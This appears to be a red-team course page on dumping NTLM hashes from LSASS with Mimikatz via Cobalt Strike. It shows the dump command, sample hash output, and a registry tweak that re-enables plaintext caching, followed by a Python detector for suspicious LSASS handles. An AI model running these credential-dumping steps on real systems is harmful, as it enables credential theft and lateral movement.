NTLM Hashes

The sekurlsa::logonpasswords Mimikatz module is infamous for being able to "dump plaintext passwords from memory". Having a user's actual password has obvious advantages and was a lucrative tactic for a long time. However, Microsoft have added a number of mitigations over the years, most notably that WDigest no longer caches plaintext credentials in LSASS by default (from Windows 8.1 / Server 2012 R2 onwards, and via KB2871997 on older versions), so happening across plaintext passwords on a modern Windows 10+ host is much less common. Be aware that an administrator (or an attacker) can turn this caching back on by setting UseLogonCredential to 1 under HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest, although it only takes effect for logons that happen after the change.

The module is still able to retrieve NTLM hashes (strictly, the NT hash: an unsalted MD4 of the UTF-16LE password) from the MSV authentication package. These can be used directly in a Pass the Hash attack, or cracked offline to recover the plaintext.

This command requires elevated privileges (a high-integrity Beacon), because it opens a handle to LSASS and reads its memory.

beacon> mimikatz !sekurlsa::logonpasswords

Authentication Id : 0 ; 579458 (00000000:0008d782)
Session           : Batch from 0
User Name         : jking
Domain            : DEV
Logon Server      : DC-2
Logon Time        : 8/31/2022 11:49:48 AM
SID               : S-1-5-21-569305411-121244042-2357301523-1105
	msv :
	 [00000003] Primary
	 * Username : jking
	 * Domain   : DEV
	 * NTLM     : 59fc0f884922b4ce376051134c71e22c
	 * SHA1     : 74fa9854d529092b92e0d9ebef7ce3d065027f45
	 * DPAPI    : 0837e40088a674327961e1d03946f5f2

Cobalt Strike also has a short-hand command, logonpasswords, which runs the same module. After dumping these credentials, go to View > Credentials to see a copy of them in the credential store.

OPSEC This module opens a read handle to LSASS, which can be logged as Security event 4656 ("A handle to an object was requested") when object access auditing is enabled for it; check the audit policy before relying on this event. Use the "Suspicious Handle to LSASS" saved search in Kibana to see them.

The resulting event shows the user WKSTN-2$ (which means SYSTEM on WKSTN-2) obtaining a handle to LSASS from powershell.exe with an access mask of 0x1010. This is the combination of PROCESS_QUERY_LIMITED_INFORMATION (0x1000) and PROCESS_VM_READ (0x0010), which is consistent with the OpenProcess call in the Mimikatz source code. PROCESS_VM_READ is the bit that matters for detection: without it the handle cannot be used to read credential material out of LSASS memory.
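The following is an added example (not part of the course page or of the Kibana saved search) showing the logic behind that detection: decode the 4656 AccessMask into named process rights and flag any handle to lsass.exe that carries PROCESS_VM_READ from a process outside a small allowlist. The events, the volume path and the allowlist are constructed for the example and would need tuning per environment.

```python
from typing import Dict, List

# Process access rights from winnt.h (subset sufficient for LSASS-handle triage).
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

# A credential dumper needs to read LSASS memory, so PROCESS_VM_READ is the bit we key on.
DUMP_BITS = 0x0010

# Processes allowed to hold read handles to LSASS on this host (assumption for the example).
ALLOWLIST = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}


def decode_access_mask(mask) -> List[str]:
    """Translate a 4656 AccessMask (int, or the '0x1010' string form from the log) into rights."""
    value = int(mask, 16) if isinstance(mask, str) else mask
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if value & bit]


def is_lsass_read_handle(event: Dict[str, str]) -> bool:
    """True when a non-allowlisted process obtained a VM_READ-capable handle to lsass.exe."""
    if event.get("EventID") != "4656" or event.get("ObjectType") != "Process":
        return False
    # ObjectName for a process object is the NT device path of the image.
    if not event.get("ObjectName", "").lower().endswith(r"\lsass.exe"):
        return False
    mask = int(event.get("AccessMask", "0x0"), 16)
    if not mask & DUMP_BITS:
        return False
    return event.get("ProcessName", "").lower() not in ALLOWLIST


def find_lsass_handles(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return the subset of events that warrant a look from an analyst."""
    return [e for e in events if is_lsass_read_handle(e)]


# Constructed 4656 events (field names follow the Windows Security log; values are made up).
SAMPLE_EVENTS = [
    {"EventID": "4656", "SubjectUserName": "WKSTN-2$", "ObjectType": "Process",
     "ObjectName": r"\Device\HarddiskVolume2\Windows\System32\lsass.exe",
     "ProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "AccessMask": "0x1010"},
    {"EventID": "4656", "SubjectUserName": "WKSTN-2$", "ObjectType": "Process",
     "ObjectName": r"\Device\HarddiskVolume2\Windows\System32\lsass.exe",
     "ProcessName": r"C:\Windows\System32\svchost.exe",
     "AccessMask": "0x1000"},   # query-only: cannot read memory
    {"EventID": "4656", "SubjectUserName": "jking", "ObjectType": "Process",
     "ObjectName": r"\Device\HarddiskVolume2\Windows\System32\notepad.exe",
     "ProcessName": r"C:\Windows\System32\Taskmgr.exe",
     "AccessMask": "0x1410"},   # VM_READ, but the target is not LSASS
    {"EventID": "4656", "SubjectUserName": "WKSTN-2$", "ObjectType": "Process",
     "ObjectName": r"\Device\HarddiskVolume2\Windows\System32\lsass.exe",
     "ProcessName": r"C:\Windows\System32\svchost.exe",
     "AccessMask": "0x1010"},   # read handle, but from an allowlisted process
]


if __name__ == "__main__":
    for hit in find_lsass_handles(SAMPLE_EVENTS):
        rights = " | ".join(decode_access_mask(hit["AccessMask"]))
        print(f"{hit['SubjectUserName']} {hit['ProcessName']} -> lsass.exe [{rights}]")
```

Matching the full access mask 0x1010 exactly would miss tooling that requests PROCESS_ALL_ACCESS or adds PROCESS_QUERY_INFORMATION, so the check tests the single PROCESS_VM_READ bit instead. Allowlisting by image path is a convenience for noise reduction, not a security boundary: a renamed or injected-into process defeats it, so the allowlist should stay short and be reviewed.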
